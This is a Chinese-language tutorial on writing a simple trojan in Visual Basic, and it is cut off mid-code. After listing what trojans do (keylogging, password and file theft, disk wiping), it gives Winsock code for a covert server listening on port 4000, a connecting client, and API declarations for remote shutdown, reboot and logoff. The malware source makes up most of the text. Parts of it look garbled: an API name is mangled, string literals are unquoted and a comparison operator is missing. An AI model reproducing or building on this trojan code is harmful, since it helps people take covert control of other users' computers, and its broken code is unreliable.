怎样用VB写一个简单木马.docVIP

怎样用VB写一个简单木马 相信大家或多或少都听说过木马这个东西，可能它的危力也有过不少人领教过---在后台记录你的键盘输入，截取你的密码；从你的机子中神密地偷走你的重要资料；甚至格掉你的硬盘……那这些厉害的家伙它们是如果工作的呢？ 其实这些家伙已经并不是十分高明的技术了，它们不外乎也就是基于TCP／IP协议的客户端／服务端程序。工作原理也与普通的客户端／服务端软件一样，只不过它们隐藏得比较好，不容易发现而已。首先对你怀有野心的人利用现成的操作系统或是某些软件本身的漏洞想方设法的把服务端程序加到你的本机上运行，然后通过客户端向你本机中的服务端程序发出一些请求，最后对你本机进行操作，完成他们想要达到的目的。 那这些请求是如何实现的呢？下面我来举一个例子。 首先，新建一工程，名为Server，新建一个窗体，Name为frmServer，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCP／IP协议。 接下来我们回来frmServer窗体模块中，添加如下代码： Private Sub form_Load() With Me .sckServer.LocalPort = 4000‘本地端口 .sckServer.Listen ‘开始监听 End With End Sub ‘接受客户端的连接请求。 Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) With Me If .sckServer.State sckClosed Then .sckServer.Close .sckServer.Accept (requestID) End With End Sub 下面我们来建立客户端程序：新建一个工程，名为Client，把窗体名为frmClient，在上面加入一个winsock控件，名为sckClient，协议为TCP／IP协议。再加一个按钮cmdConnect在窗体模块中加入代码： Private Sub form_Load() With Me .sckClient.RemoteHost = 127.0.0.1‘设置远程IP，本例设为本机。 .sckClient.RemotePort = 4000 ‘远程端口,就为server中的设置一样. End With End Sub Private sub cmdConnect_Click() SckClient.Connect End sub 至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print “Connetion successful!”来查看。 这仅是第一步，一点工作也做不了，下面我们来为它们添加功能。为了简单，本文章只实现一点小小的功能―――关机，重启，注销。好，开始吧！ 在Server工程中新建一个模块，Name为modApi，这个模快为一些API函数，添加如下API函数： Public Declare Function ExitWindowXXX Lib user32 Alias ExitWindowXXX (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Public Const EWX_LOGOFF = 0 Public Const EWX_REBOOT = 2 Public Const EWX_SHUTDOWN = 1 Public Declare Function ClipCursor Lib user32 Alias ClipCursor (lpRect As Any) As Long Public Type RECT Left As Long Top As Long Right As Long Bottom As Long End Type 注：在两个socket中编程中，进行通信的重要事件是DataArrival事件，用于接收远程数据。 下面在Client工程的frmClient窗体中放入三个按钮，分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机，注销，重启操作。分别添加如下代码： Private Sub cmdExit_Click() Me.sckClient.SendData Exit End Sub Private Sub cmdLogoff_Click() Me.sckClient.SendData Logoff End Sub Privat